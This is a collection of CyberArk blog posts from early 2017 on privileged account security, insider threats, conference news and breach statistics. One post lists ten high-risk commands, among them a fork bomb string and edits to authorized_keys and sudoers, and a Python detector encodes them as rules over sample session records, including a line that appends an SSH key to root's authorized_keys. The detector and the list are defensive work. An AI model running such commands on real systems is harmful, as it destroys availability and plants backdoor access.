RSA Conference 2017: Privileged Account Security across the Enterprise https://www.cyberark.com/blog/rsa-conference-2017-privileged-account-security-across-enterprise/ Fri, 24 Feb 2017 16:28:23 +0000 https://www.cyberark.com/blog//

With record-breaking attendance and a jam-packed agenda of thought-provoking keynotes, technical sessions, tutorials and seminars, this year’s RSA Conference was not one to miss. Everywhere you turned, there was something new to learn and see—from debating about how artificial intelligence and machine learning could shape the industry’s future, to meeting young startups approaching security challenges in interesting new ways, to participating in lively technical discussions with peers and partners. With more than 43,000 people in attendance, I can’t help but wonder if, after 26 years, it is time to move the RSA Conference to Vegas!?

Just like the conference, there wasn’t a dull moment at the CyberArk booth. After kicking off the show by announcing our new insider threat detection capabilities, we hosted record numbers of attendees for one-on-one demos, small group discussions and partner presentations with several of our C3 Alliance members. Throughout the week, one thing was clear: Organizations have graduated from the education stage and fully understand that privilege is the one constant in the cyber attack lifecycle.

Throughout the week, several buzzwords and hot topics topped the charts:

  • Insider Threats: An insider who has gained access to privileged credentials can initiate seemingly legitimate privileged user sessions, making it incredibly difficult to detect. Our newly announced capability automatically analyzes all privileged users’ session activity to instantly identify high-risk activity and alert security teams to a potential incident before it’s too late. By automating this process and detecting more threats faster, organizations can gain an opportunity to disrupt inside attackers—and careless users—before these incidents turn into costly, reportable breaches.
  • Endpoint: The vast majority of advanced attacks start at the endpoint when attackers breach the perimeter and target credentials. To help organizations better detect and contain cyber attacks, we’ve combined targeted analytics with proven privilege management and application control capabilities—so that organizations can effectively lock-down privileges on the endpoint without impacting productivity.
  • Cloud Migration: Accelerated cloud migration requires IT leaders to implement more effective risk management strategies from the start in order to better protect against advanced threats. We can help to eliminate the security gaps across public, private, hybrid cloud and SaaS environments by protecting all privileged accounts—wherever they are.

These topics were also highlighted in Brandon Traffanstedt’s RSA session entitled “The Privilege Connection: Cloud, DevOps and Stopping Advanced Threats.” During this talk, he outlined best practices for reducing the attack surface by securing privileged accounts across the enterprise—on-premises, in the cloud and on endpoints, as well as privileged credentials used by DevOps automation and orchestration tools.

Rounding out the week was CyberArk CEO Udi Mokady’s appearance on the panel, “Meet the Leaders of the Startup Nation.” He, along with a panel of industry experts, ex-intelligence officers and leading academics, talked about how Israel became known as the “Startup Nation.”

To top it all off, we received an SC Award for Best Identity Management Solution. We couldn’t be more proud of our team and are honored to be recognized by the SC Awards for this commitment to innovation and product excellence.

Thanks to our customers, partners and team, RSA 2017 is a show we won’t soon forget. See you next year.

Don’t Analyze Everything – Analyze the Right Thing to Detect and Respond to Insider Threats https://www.cyberark.com/blog/dont-analyze-everything-analyze-right-thing-detect-respond-insider-threats/ Tue, 14 Feb 2017 13:58:22 +0000 https://www.cyberark.com/blog//

In 2013, organizations worldwide started to take insider threats seriously, thanks to a man named Edward Snowden. Yet, his is just one of many cases of authorized insiders who have caused damage – both intentionally and accidentally – to the organizations that trusted them. From the Sage Group incident in the UK to the case of Harold Martin to, most recently, the IT admin who allegedly held a university’s email system hostage in exchange for $200,000, insider threats are a constant in today’s world. What’s worse, these examples don’t even begin to touch on the 50 percent of breaches each year that are caused by inadvertent human error.

Today, CyberArk announced a new capability that helps organizations automatically detect and quickly respond to insider threats. The solution automatically records and analyzes all privileged users’ sessions to instantly identify high-risk activity and alert security teams to a potential incident before it’s too late. By automating this process and detecting threats faster, organizations can gain an opportunity to disrupt inside attackers – and careless users – before these incidents turn into costly, reportable breaches. Here’s how you can use this new capability to improve your insider threat detection, investigation and response processes:

Identify and define risks. Define the activities that are particularly high-risk in your organization, and customize your solution to alert you when these activities occur. The activities considered “high-risk” will likely differ from organization to organization, but if you’re not quite sure where to start, check out these recommendations as a starting point.

Track everything. When your privileged users access high-value systems, record everything they do. By tracking each and every action they take during privileged sessions, you’ll have a data stream that can be automatically analyzed. If something suspicious occurs, you’ll have a full video recording to review exactly what happened.

Automate threat detection. You don’t have the time to manually sift through session recordings to look for suspicious behavior – nor should you. Automate the review of privileged user sessions to detect high-risk activity as soon as it occurs.

Respond quickly. With the automated review of user activity, you can be alerted to potential insider attacks immediately. Once you see the alert, you can investigate the situation, watch the suspicious session if it’s still in-progress, and terminate the session to stop any further damage from occurring.

Prioritize audit review. Enable your auditors to be more effective. By applying risk indexes to recorded sessions, auditors can easily prioritize sessions for review, complete audits faster and deliver greater value to the business.

When it comes to threat detection, there is a lot of data you can analyze, but to protect your organization’s most sensitive assets, you need to focus on what matters most. By proactively analyzing privileged user activity on high-value assets, you can focus your efforts on your most sensitive users and information to gain prioritized, actionable alerts that can help you quickly detect and respond to attackers inside your network.

Read this eBook to learn who your insiders really are, and watch this whiteboard video to learn more about how the solution works.

Spot Insider Threats: 10 Commands Commonly Used During the Cyber Attack Cycle https://www.cyberark.com/blog/spot-insider-threats-10-commands-commonly-used-cyber-attack-cycle/ Tue, 14 Feb 2017 13:30:10 +0000 https://www.cyberark.com/blog//

Today, CyberArk announced a new capability that helps organizations automatically detect insider threats and accelerate incident response times. With this integrated release of CyberArk Privileged Threat Analytics and CyberArk Privileged Session Manager, customers can now receive customizable, prioritized alerts on high-risk user activity – during privileged sessions – to help security teams swiftly investigate and disrupt potential insider attacks.

Throughout the course of this release, we worked closely with our customers to understand their privileged threat detection needs and gain insight into how they prefer to receive alerts. Over the course of this process, we heard two pieces of feedback time and again.

First, customers want to customize detection capabilities so that, over time, they can tailor alerts to their specific needs. I’m happy to share that with this release we’ve provided that flexibility.

Second, because of our expertise in the privileged account security space, customers have asked us for ideas on what types of high-risk activity to look for initially. To help answer this question, we consulted with experts from CyberArk Labs and our customers’ security operations teams to develop a list of ten commands that are frequently associated with malicious – or accidentally damaging – behavior.

It’s always worth noting that no two situations are the same, so an action that may be harmless in one situation may create a major security issue in another. However, in the spirit of sharing what we learned, here are ten highly sensitive commands that were frequently cited as being indicative of risk:

  1. mmc.exe, Active Directory Users and Computers – This action opens a window in which a Windows user can add new user accounts to the domain. This could indicate that an attacker is creating backdoor access to establish persistence throughout the entire Windows domain.
  2. explorer.exe, User Accounts – As suggested by its name, this action opens a window in which a Windows user is able to add new accounts to the system. This could indicate that an attacker is creating backdoor access to the system to establish persistence.
  3. regedit.exe, Registry Editor – This action opens a window that provides access to the Windows registry. From the registry, a user can change critical system configurations, alter security settings and access sensitive credential data on the system. CyberArk Labs research demonstrates how malicious users can alter registry settings to steal credentials.
  4. mmc.exe, Windows Firewall with Advanced Security – Access to the Windows Firewall enables users to modify security configurations on a system. Access to firewall settings may indicate that an attacker is disabling security controls on the machine to make the next steps of the attack chain easier.
  5. mmc.exe, Network Policy Server – The Windows Network Policy Server enables users to modify the network configuration. Access to this window could indicate that an attacker is enabling unauthorized access to or from the machine.
  6. authorized_keys – Commands containing “authorized_keys” can provide access to the authorized keys files on *nix systems. From this file, a user can add unauthorized SSH keys to the machine. Access to this file may indicate that an attacker is creating backdoor access to the system to establish persistence.
  7. sudoers – Commands containing “sudoers” can provide access to the sudoers file on *nix systems. Within this file, a user is able to manipulate user privileges on the system. Such an action could indicate that an attacker is granting unauthorized permissions to an account, which can be used at a later time to cause damage.
  8. :(){ :|: & };: – When entered on *nix systems, this sequence of characters operates a fork bomb to consume all machine resources and make the server unusable. These characters would not be entered accidentally, and thus represent an intentional attempt to harm the organization.
  9. tcpdump – When entered on *nix systems, this action dumps all accessible network packets. The use of this command may indicate that an attacker is attempting to learn about the communication channels of the machine and use that information to plan the next steps in the attack.
  10. rm – When entered on *nix systems, this command enables a user to delete files and directories. Such an action may indicate that a user is trying to harm the machine to potentially disrupt business.

While this list can be used as a starting point, it’s always important to keep in mind that every environment is different. When deciding which commands to detect initially, it’s important to consider what systems you run, what systems store your most sensitive information and what actions occur on a day-to-day basis within your organization. We’re here to help you understand potential risks and share knowledge from both our in-house and customer experts.
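As an added illustration of how such a list turns into detection logic (this is example code written for this page, not CyberArk’s Privileged Threat Analytics or Privileged Session Manager), the script below encodes the ten indicators as rules, scans constructed privileged-session audit records, and assigns each session a risk index. The record format, rule names, scores and the per-user exclusion mechanism are assumptions; note that “rm” is matched as a whole command word rather than as a substring, so a path such as /etc/firmware does not trigger it.

```python
"""Example detector for the ten high-risk indicators listed above.

Added example, not CyberArk product code. The audit-record shape (SessionEvent),
rule scores and the exclusion list are assumptions made for this illustration.
"""
import os
import re
from dataclasses import dataclass
from typing import Dict, FrozenSet, Iterable, List, Optional, Tuple


@dataclass(frozen=True)
class SessionEvent:
    session_id: str
    user: str
    platform: str  # "windows" or "unix"
    action: str    # window title opened (Windows) or command line typed (*nix)


@dataclass(frozen=True)
class Rule:
    name: str
    platform: str
    kind: str      # "title": exact window title; "substring": anywhere in line; "token": command word
    pattern: str
    score: int     # assumed severity, 0-100


@dataclass(frozen=True)
class Alert:
    session_id: str
    user: str
    rule: str
    score: int
    action: str


# The ten indicators from the list above. Scores are assumptions for prioritisation.
RULES: List[Rule] = [
    Rule("ad-users-and-computers", "windows", "title", "mmc.exe, Active Directory Users and Computers", 80),
    Rule("local-user-accounts", "windows", "title", "explorer.exe, User Accounts", 70),
    Rule("registry-editor", "windows", "title", "regedit.exe, Registry Editor", 60),
    Rule("windows-firewall", "windows", "title", "mmc.exe, Windows Firewall with Advanced Security", 70),
    Rule("network-policy-server", "windows", "title", "mmc.exe, Network Policy Server", 70),
    Rule("ssh-authorized-keys", "unix", "substring", "authorized_keys", 80),
    Rule("sudoers-file", "unix", "substring", "sudoers", 80),
    Rule("fork-bomb", "unix", "substring", ":(){ :|: & };:", 100),  # matched as text only, never executed
    Rule("packet-capture", "unix", "token", "tcpdump", 50),
    Rule("file-deletion", "unix", "token", "rm", 40),
]


def _command_words(line: str) -> List[str]:
    """Split a shell line on whitespace and common separators and strip path prefixes,
    so "sudo /bin/rm -rf x | tee log" yields ["sudo", "rm", "-rf", "x", "tee", "log"]."""
    return [os.path.basename(w) for w in re.split(r"[\s|;&]+", line) if w]


def match_event(event: SessionEvent, rules: Iterable[Rule] = RULES,
                allowed: FrozenSet[Tuple[str, str]] = frozenset()) -> Optional[Rule]:
    """Return the highest-scoring rule that fires on this event, or None.
    `allowed` holds (user, rule_name) pairs that are expected for that user and
    are therefore suppressed, the kind of tailoring the text recommends."""
    best: Optional[Rule] = None
    for rule in rules:
        if rule.platform != event.platform or (event.user, rule.name) in allowed:
            continue
        if rule.kind == "title":
            hit = event.action.strip().casefold() == rule.pattern.casefold()
        elif rule.kind == "substring":
            hit = rule.pattern in event.action
        else:  # "token": the command word itself, not an arbitrary substring
            hit = rule.pattern in _command_words(event.action)
        if hit and (best is None or rule.score > best.score):
            best = rule
    return best


def detect(events: Iterable[SessionEvent], rules: Iterable[Rule] = RULES,
           allowed: FrozenSet[Tuple[str, str]] = frozenset()) -> List[Alert]:
    """Scan a stream of session records and emit one alert per matching event."""
    rules = list(rules)
    alerts: List[Alert] = []
    for ev in events:
        rule = match_event(ev, rules, allowed)
        if rule is not None:
            alerts.append(Alert(ev.session_id, ev.user, rule.name, rule.score, ev.action))
    return alerts


def session_risk(alerts: Iterable[Alert]) -> Dict[str, int]:
    """Risk index per session: highest hit plus 10 for each further hit, capped at 100."""
    scores: Dict[str, List[int]] = {}
    for a in alerts:
        scores.setdefault(a.session_id, []).append(a.score)
    return {sid: min(100, max(s) + 10 * (len(s) - 1)) for sid, s in scores.items()}


# Constructed sample records, not real audit data.
SAMPLE_EVENTS: List[SessionEvent] = [
    SessionEvent("s1", "jdoe", "windows", "mmc.exe, Active Directory Users and Computers"),
    SessionEvent("s1", "jdoe", "windows", "notepad.exe, Untitled - Notepad"),
    SessionEvent("s2", "ops", "unix", "sudo tcpdump -i eth0 -w /tmp/capture.pcap"),
    SessionEvent("s2", "ops", "unix", "echo 'ssh-rsa AAAA-constructed' >> /root/.ssh/authorized_keys"),
    SessionEvent("s3", "backup", "unix", "rm -rf /var/backups/old"),
    SessionEvent("s3", "backup", "unix", "cat /etc/firmware/version"),  # no false positive on "rm"
    SessionEvent("s4", "dev", "unix", ":(){ :|: & };:"),
]

if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for sid, risk in sorted(session_risk(found).items(), key=lambda kv: -kv[1]):
        print(f"session {sid}: risk {risk}")
    for a in found:
        print(f"  [{a.score:3}] {a.session_id} {a.user}: {a.rule} <- {a.action}")
```

Passing `allowed=frozenset({("backup", "file-deletion")})` to `detect` suppresses the expected rm usage by the backup account while keeping every other rule active.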

To learn more about our new ability to automatically detect potential insider threats, read this article.

When Innocent Mistakes Turn Into Costly Problems https://www.cyberark.com/blog/innocent-mistakes-turn-costly-problems/ Thu, 09 Feb 2017 14:57:12 +0000 https://www.cyberark.com/blog//

When most people hear about an “insider threat,” they often assume it’s a malicious employee who is either out to prove a point or trying to selfishly make a buck. Yet, as one startup learned last week, the real “insider threat” is often a well-intentioned person who, in the course of simply trying to do his or her job, accidentally causes something to go wrong.

Human error is a prevalent cause of accidents, which means IT and security teams should prepare accordingly to limit the resulting damage. Here are a few steps organizations can take to limit the impact of accidental insider damage:

  • Control executables. Even the most security-aware users fall victim to spear-phishing attacks. By controlling what’s allowed to execute on your systems, you can block attackers’ malware from taking over devices and unknowingly exploiting legitimate user privileges.
  • Get rid of unnecessary privileges. In the case of GitLab, the team member who accidentally deleted a production database was, in fact, authorized to do so. Yet, too often that’s not the case. According to one recent survey, 91 percent of insiders have access to systems that they shouldn’t. If you can’t access it, you can’t break it.
  • Monitor user activity. Something about being watched by an authority figure encourages people to think twice about their actions. By recording all activity as users access sensitive IT systems, you can encourage your most privileged users to double check their work and discourage any foul play. This means fewer mistakes, fewer malicious actions and less damage to clean up.
  • Backup. Then backup some more. If IT teams learned one thing in 2016 (or “The Year of Ransomware” if you read the news), it’s that backing up sensitive data is an imperative. Whether an IT admin accidentally deletes an entire database or a cybercrime ring takes your servers hostage, backups are extremely handy. Just ask any of the companies who learned this lesson the hard way.

You can’t predict which users are accidentally going to damage your systems or fall victim to well-disguised attackers, but you can predict that these things will happen – and more than once. However, with some preparation, you can make sure that when these incidents occur the repercussions are minimal.

The Value of Experience: Leveraging Peer-to-Peer Guidance https://www.cyberark.com/blog/value-experience-leveraging-peer-peer-guidance/ Tue, 07 Feb 2017 14:35:41 +0000 https://www.cyberark.com/blog//

There is a story of a man trapped in a deep hole, shouting for help. A second man passing by hears the calls and jumps into the hole with him. “Why did you do that?” the first man asks. “Now we’re both down here!”

“Yes,” the second man replies, “but I’ve been here before, and I know the way out.”

If you feel like you’re in over your head trying to implement cyber security and incident response programs for your organization, you are not alone. Your peers have been there, and their experience and advice can help you to get to where you need to be in 2017.

Don’t reinvent the wheel

The unfortunate reality is that every organization today is a target and must not only secure itself against cyber attacks, but also be prepared to respond to data breaches and other security incidents. Constantly evolving threats exploit long-standing vulnerabilities in the enterprise, and in many instances compromises go for months before detection.

Assume that a breach will occur at some point and be prepared to address it. But forewarned is forearmed, and there is no reason to wait until it occurs or to reinvent the wheel.

In a keynote address at a forum in Boston on the State of Cybersecurity, CyberArk Chairman and CEO Udi Mokady noted that cyber security is a team sport, not an individual competition. As attackers become more organized and share resources, it is important that defenders also share their experiences. Collectively, the community will benefit from the lessons learned rather than starting from scratch as each threat appears.

Lessons learned

What those who have been there already know is that strong controls are needed on privileged accounts and credentials to block intruders and limit their access to critical assets.

Attackers take advantage of common weaknesses in credential management, exploiting the way administrative credentials are stored in memory on Windows machines. Giving unnecessary administrative access to end users and to IT admins, using default passwords, cloning workstation images, allowing the same local administrator password to be used on many machines — these are all bad practices that can open up your network and your data to an intruder who has made it past the perimeter.

Once intruders have gained a foothold on a workstation using a stolen admin password, they can move to other workstations using the same password or extract password hashes for recent log-ins from computer memory. Intruders can move not only laterally throughout the system, but they can also escalate privileges to gain access to higher value assets.

The value of experience

The latest CISO View report, which draws on the experience of security experts who were involved in the aftermath of some of the most devastating breaches in the last 24 months, offers a framework for a cyber security sprint that can help your organization rapidly reduce privileged credential risk. This framework, a 30-day sprint to protect privileged credentials, has been reviewed and validated by The CISO View panel: top security executives from ING Bank, CIBC, Rockwell Automation, Lockheed Martin, Starbucks, ANZ Banking Group Limited, CSX Corporation, Monsanto Company, Carlson Wagonlit Travel, SGX, News UK and McKesson.

By leveraging the experience of professionals who have been on the front lines, or have made privileged account security a core part of their security programs, organizations can follow a proven plan to implement the essential security controls needed to protect high-risk privileged accounts now, rather than scrambling to put them in place after a breach has occurred.

You don’t have to start from scratch. Take advice from your peers and read “The CISO View report: Rapid Risk Reduction: A 30 Day Sprint to Protect Privileged Credentials.”

Conjur and Shadow-Soft Form Partnership to Deliver Trust Management for Cloud Applications https://www.cyberark.com/blog/conjur-and-shadow-soft-form-partnership-to-deliver-trust-management-for-cloud-applications/ Tue, 24 Jan 2017 14:35:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-and-shadow-soft-form-partnership-to-deliver-trust-management-for-cloud-applications/  

Collaboration Delivers Secrets Management at Scale for Shadow-Soft Customers

WALTHAM, Mass., January 24, 2016 — Today Conjur, a trust management platform for the cloud, has announced a partnership with Shadow-Soft, a solution integrator specializing in DevOps, cloud migrations and security. Shadow-Soft will provide and integrate Conjur’s trust management software solution for existing clients and new customers to add stronger, more scalable security capabilities as they migrate to the cloud.

As DevOps and cloud infrastructure deployments mature, the applications they host become more important and the threats facing their security become more acute. Shadow-Soft saw a need among companies facing these challenges to employ a more robust approach to identity and access rights for the building blocks of their cloud infrastructure like VMs, AMIs and containers. Conjur will now address this key requirement for new and existing Shadow-Soft customers.

“Working with Conjur allows us to offer a solution our customers increasingly need,” said James Chinn, CEO of Shadow-Soft. “Like Conjur, we are committed to helping companies securely embrace the cloud and effectively manage their infrastructure once they get there. This partnership allows us to bring Conjur’s trust management platform and the security it offers to our customers, enabling them to deploy important applications in the cloud with confidence.”

“Shadow-Soft is an ideal partner for Conjur because of their cloud focus, commitment to innovation and security savviness,” said Elizabeth Lawler, CEO and co-founder of Conjur. “Shadow-Soft’s clients are moving rapidly along the cloud adoption maturity curve. As they deploy increasingly important applications in the cloud, they need to manage secrets at scale, integrate security across their new tool chains, and leverage existing trust systems. Our trust management software is uniquely able to allow them to do all these things, and Shadow-Soft is perfectly positioned to leverage Conjur to help clients move forward securely with their cloud initiatives.”

About Conjur

Conjur delivers a trust management software platform that enables organizations to balance their goal of adopting cloud computing with their need to ensure security. Conjur automates machine identity provisioning, authorization of privileged access, service account control, and machine-to-machine connectivity in a way that meets the needs of all DevSecOps stakeholders. Companies adopting dynamic, cloud-centric IT infrastructure across industries, including financial services, communications, media and software development, consider Conjur an essential component of their security strategy. Conjur is headquartered in Waltham, Mass., and is backed by Amplify Partners, Avalon Partners and Koa Labs. For more information, please visit www.conjur.com or follow @conjurinc on Twitter.

About Shadow-Soft

Shadow-Soft is an award-winning, Open Source integrator, committed to solving critical business challenges using open technologies. For nearly a decade we’ve been the leader in DevOps, Middleware, Cloud, Big Data and Security solutions. Our expert consulting and managed services teams specialize in migrating legacy applications, modernizing and optimizing infrastructure, deploying Agile & DevOps methodologies through orchestration & automation, and maintaining these environments on public or private clouds. We are headquartered in Atlanta, with offices in Reston, Virginia and Charleston, South Carolina. For more information, please visit www.shadow-soft.com or follow @ShadowSoftNews on Twitter.


Media Contact:
Lesley Sullivan
LaunchSquad
617-945-1915
conjur@launchsquad.com

Russians, APTs and Cyber Security: What’s So Common about Common Sense Anyway? https://www.cyberark.com/blog/russians-apts-cyber-security-whats-common-common-sense-anyway/ Tue, 24 Jan 2017 13:00:49 +0000 https://www.cyberark.com/blog//

While the world awaits the next titillating chapter of the ongoing saga involving Russia and the U.S. presidential election, there is one section of the recently released Joint Action Report (JAR) compiled by the DHS and FBI that has gone unnoticed and woefully under-reported — and worth digging into.

Yes, there was a lot of discussion as to whether the JAR achieved the goal of proving the Russians tampered with the US election, but I didn’t see one report on the section that every business and agency should pay attention to – the mitigation strategies to prevent cyber attacks.

In the “Top Seven Mitigation Strategies” section of the report, the DHS states:

DHS encourages network administrators to implement the recommendations below, which can prevent as many as 85 percent of targeted cyber-attacks. These strategies are common sense to many, but DHS continues to see intrusions because organizations fail to use these basic measures.

Let that sink in… 8 out of 10 cyber-attacks could be stopped if organizations embraced “common sense” and basic cyber security strategies.

Is Common Sense Really That Common?

It can’t be that easy, right? Surely the DHS is highlighting advanced cyber security strategies that are too time-consuming, costly and intrusive for organizations to implement. Let’s look at the recommendations:

  1. Patch applications and operating systems
  2. Application whitelisting
  3. Restrict administrative privileges
  4. Network segmentation and segregation into security zones
  5. Input validation
  6. File reputation/AV tuning
  7. Understanding firewalls

Well, I have to agree with DHS on this one – these are basic, they are common sense, and they are eminently achievable by any organization that cares a modicum about cyber security. Yet far too many organizations either aren’t aware of basic security best practices, or worse, simply choose to ignore them.

While we’re channeling righteous anger at the prospect of Russia interfering with the U.S. election, could we spare some indignation for the continued failure to address basic security issues?

This isn’t a political issue. This is a problem that spans the public/private sector.

Why We Fail To Embrace Basic Security

This is a question that keeps me up at night – why? Is it an issue of awareness?

Well, a lot of these recommendations are found in long-standing compliance regulations, including HIPAA, PCI DSS, FDCC, Government Connect, FISMA, SOX and more.

On the Federal side, the U.S. GAO issued reports highlighting critical cyber vulnerabilities at the FDA, the FDIC, the IRS, the Department of Education, the FAA, and, in one case, called out 24 agencies in one report. These vulnerabilities align with the seven steps outlined above.

Private enterprise hasn’t proven to be much better (don’t worry John Podesta, you aren’t alone) – spear phishing campaigns have been used to attack major global banks, retailers and technology companies.

Is it a case of a lack of funding and spending? I’d say no. According to IDC, in 2020, organizations are expected to spend $101.6 billion on security software, services and hardware.1 We’ve seen other estimates that go even higher.

Can We Be Secure?

It’s a tough question to answer when basic cyber security practices are met with an audible sigh across all sectors. We’ve reached a point where the entire ecosystem – politicians, Federal and State government, media, security vendors and businesses – are talking at each other about security, but no one is really listening.

We’re on a cyber security carousel with no sign of it stopping – we call out the same vulnerabilities and issues again and again, yet there’s little action to actually address the fact that we’re leaving our front and back doors open to our geopolitical enemies, and anyone else who wants to come in.

1 – IDC Press Release, “Worldwide Revenue for Security Technology Forecast to Surpass $100 Billion in 2020, According to the New IDC Worldwide Semiannual Security Spending Guide,” October 12, 2016

Small and Medium-Sized Businesses Not Immune From Cyber Attacks https://www.cyberark.com/blog/small-medium-sized-businesses-not-immune-cyber-attacks/ Fri, 20 Jan 2017 18:34:19 +0000 https://www.cyberark.com/blog//

Small- and medium-sized businesses (SMBs) are the backbone of the U.S. economy. According to data available in the U.S. Small Business Administration’s Small Business Profile for 2016, SMBs with fewer than 500 employees make up 99.7 percent of all U.S. companies and employ 56.8 million workers—48 percent of the U.S. workforce.

Cyber security is as important for these companies as it is for large multinationals. SMBs also have sensitive information from employees and customers, proprietary information about products, and they often are part of a global supply chain for other companies. Every business is a target, regardless of size, and none can afford to ignore the security of its IT infrastructure.

The SMB: lots of assets, limited resources

SMBs may assume they have little to interest hackers and therefore put cyber security on the back burner. We know this isn’t true. Hospitals, for example, hold sensitive health information and have networked medical devices at risk. Unfortunately, some learned the hard way with episodes of ransomware disrupting business and damaging reputations.

It is not just a company’s own information and systems that are at risk. SMBs have been the channel in high-profile breaches that compromised millions of records. The 2015 breach of a retail company in which data from 40 million customer credit card accounts was stolen and the U.S. Office of Personnel Management breach that exposed more than 20 million employee records are believed to have originated with credentials from third-party vendors. Attackers use a weak link in the supply chain to breach a larger target; they use the compromised credentials to escalate IT privileges and use privileged accounts to compromise critical systems.

Businesses today run on IT. This makes cyber security a business necessity as well as a technology requirement. A strong security program can not only protect a business’s assets, it can also give it a competitive advantage.

Although SMBs face the same cyber security challenges as large businesses, they often have fewer resources and little in-house expertise to address these challenges. This makes it important that they get the best return on their security investments by prioritizing the right things in their security programs.

The need to know

Cloud computing and hosted services can make advanced technology affordable, and SMBs often find it cost-effective to outsource many IT functions, including security. But at the end of the day, each business is still responsible for its own security. Owners and executives need to understand the basics of cyber security, know what their service providers are doing and what questions to ask of them.

Security needs will vary depending on circumstances. Each company must understand its attack surface—vulnerable areas in the IT environment that could be breached to compromise systems—and the impact of each potential breach. By assessing the impact, vulnerabilities can be prioritized, so that the cyber security program focuses on the areas needed to manage risks.

The key to protecting an IT infrastructure is privileged accounts. These accounts, if compromised, can effectively turn an intruder into an insider, giving the attacker rights to move throughout the network, escalate privileges, change settings and configurations and access data. When allocating scarce cyber security resources, privileged accounts must be identified, assessed and prioritized.

A single standard for security

An SMB IT infrastructure may not be as complex as a global enterprise’s, but the benefits of a layered approach to cyber security apply to all. Additionally, there are documented best practices and basic cyber hygiene practices that should be followed.

Learn more about how CyberArk can help your organization protect privileged accounts.

Noteworthy Cyber Security Statistics https://www.cyberark.com/blog/noteworthy-cyber-security-statistics/ Wed, 18 Jan 2017 18:01:41 +0000 https://www.cyberark.com/blog//

Securing privileged accounts and credentials must be at the top of the enterprise security agenda, and we’ve previously highlighted five top reasons why on CyberArk’s blog. With the launch of a new year, it’s a good time to be mindful of the lessons learned in 2016. The cyber security industry is chock-full of reports and surveys that continually provide new insights and stats. Privilege is the road most traveled in advanced attacks – that remains a constant. The sophistication of breaches, the amount of data stolen or compromised, the cost of remediation, etc. continue to evolve and advance. Here is a sampling of stats to consider:

Cost Statistics

  • In 2016, the average annual loss per company worldwide was $9.5 million.
  • In the U.S., the average annual loss per company was $17 million.
  • In the first half of 2016, 3,046,456 data records were stolen or lost every day; 126,936 data records were stolen or lost every hour; 2,116 were stolen or lost every minute and 35 were stolen or lost every second.
  • Cyber crime will cost businesses over $2 trillion by 2019.
  • The average cost of a data breach will exceed $150 million by 2020.

Attackers Will Get In, and They Will Take the Easiest Route

  • Attackers sending as few as 10 phishing emails have a 90% success rate.
  • Thirty percent of phishing emails get opened, and the #1 delivery vehicle for malware is email attachments.
  • In 93% of cases, it took attackers minutes or less to compromise systems.

Ransomware Is On the Rise

  • $209 million = FBI’s estimate of dollars lost to ransomware attacks in Q1’16.
  • $1 billion = Estimated total cost of damages related to ransomware attacks using cryptographic file-locking software in 2016.
  • Nearly 50% of organizations have been targeted with ransomware.
  • The average ransom demand is $679.

Beware the Insider Threat

  • By 2017, 41% of workers will be temps, contractors or consultants.
  • Sixty-nine percent of organizations have experienced attempted or successful data theft or corruption by corporate insiders during the last 12 months.
  • Organizations face four major insider threats: The Exploited Insider, the External “Insider,” the Malicious Insider and the Unintentional Insider.

What does your organization have in place to mitigate the risks of a cyber attack? Have you tested your incident response plan? How’s your cyber hygiene – patching, rotating and isolating sessions? How many privileged accounts does your organization have? This is a figure you should know. Now is the time to find out. Use CyberArk’s free discovery and audit tool to discover privileged accounts on-premises and in the cloud. Learn more.

Get Cyber Security Right in 2017: Prioritize Privilege https://www.cyberark.com/blog/get-cyber-security-right-2017-prioritize-privilege/ Thu, 12 Jan 2017 15:31:14 +0000 https://www.cyberark.com/blog//

Prudent organizations understand the need to have a cyber security program in place to protect assets, but it can be difficult to determine which investments will provide the best business value when making the budget case to C-level executives. This is true whether establishing a new security program or updating an existing one.

When making security plans for 2017, consider a risk-based approach focused on the paths that attackers often take to access the most critical assets in an organization. There are plenty of industry reports and government recommendations flagging the importance of securing privileged accounts and credentials—take your pick. The role they play in advanced attacks is well documented.

Privileged accounts are the gateway to your organization’s assets

Privileged accounts give access to a wide range of assets, often with authority to make changes in settings and configurations. This makes privileged accounts the gateway to your assets. The credentials for these accounts—including cryptographic keys, passwords and hashes—are the keys to these gateways; they allow attackers who have breached the perimeter to travel horizontally and vertically throughout a network to reach and exploit their desired targets.

CyberArk research has found that, on average, 40 percent of the Windows hosts on a given network, if compromised, would provide an attacker credentials that would facilitate complete compromise of the vast majority of the other Windows hosts on that network—whether directly or through a series of compromises. Although 100 percent security of your network is not feasible, denying an intruder access to privileged credentials is a critical first step in reducing risk to your most valuable assets.

Prioritizing the security of your privileged accounts is not only a good security plan, it is also a good business plan.

Making the business case for privileged account security

Most C-level executives are not hands-on in IT, but they understand the need to protect an organization’s assets, brand and reputation. Effective cyber security is necessary because if you lose administrative control of your infrastructure, you’ve lost control of your business. Your infrastructure no longer is working for you; it’s working for the intruder.

When making the case for prioritizing privileged account security, consider the following points:

  • Metrics: Establish success metrics for your cyber security program and show the progress made in improving your organization’s security posture.
    • Discover the privileged accounts on your network and identify what assets they have access to.
    • Prioritize these accounts according to the risks they represent and create a tiered plan for securing them over time.
    • Document and report progress in securing the accounts and their credentials.
  • Demonstrate value: Reduce your organization’s exposure to intruders and show the value this provides to the overall cyber security program.
    • Identify the areas of greatest business impact (such as most sensitive operations, most valuable lines of business, markets with greatest growth potential, etc.)
    • Define the attack surface of these areas based on their exposure through privileged accounts.
    • Demonstrate the reduction of the attack surface through progress in securing the accounts.

Prioritize privilege now

An effective cyber security program is a must for your organization, and the best return on your investment comes from protecting the privileged accounts and credentials that intruders exploit. If you don’t do it now, you will have to do it after an intruder has breached your perimeter. Why wait?

Here are the top five reasons to prioritize privileged account security:

  1. Privilege is the road most traveled by attackers moving through your network.
  2. Privileged accounts represent the express lane to your domain controllers, giving control of the infrastructure.
  3. Your security systems need to be secure; securing privileged accounts protects them.
  4. It’s a single solution to protect against both insider threats and external attackers.
  5. Securing privileged accounts is the first action you will have to take following a breach.

Take the first step

Make sure you know your network better than attackers do. Take inventory of your privileged accounts. CyberArk Discovery & Audit™ (DNA) is a free tool available to help organizations discover privileged accounts both on-premises and in the cloud. Use the results to assess security risks, identify accounts with local administrator rights, and identify machines vulnerable to credential theft. Prioritizing the risks lets you begin improving security right away.

Misinformation and the Loss of Public Trust https://www.cyberark.com/blog/misinformation-loss-public-trust/ Thu, 29 Dec 2016 18:17:18 +0000 https://www.cyberark.com/blog//

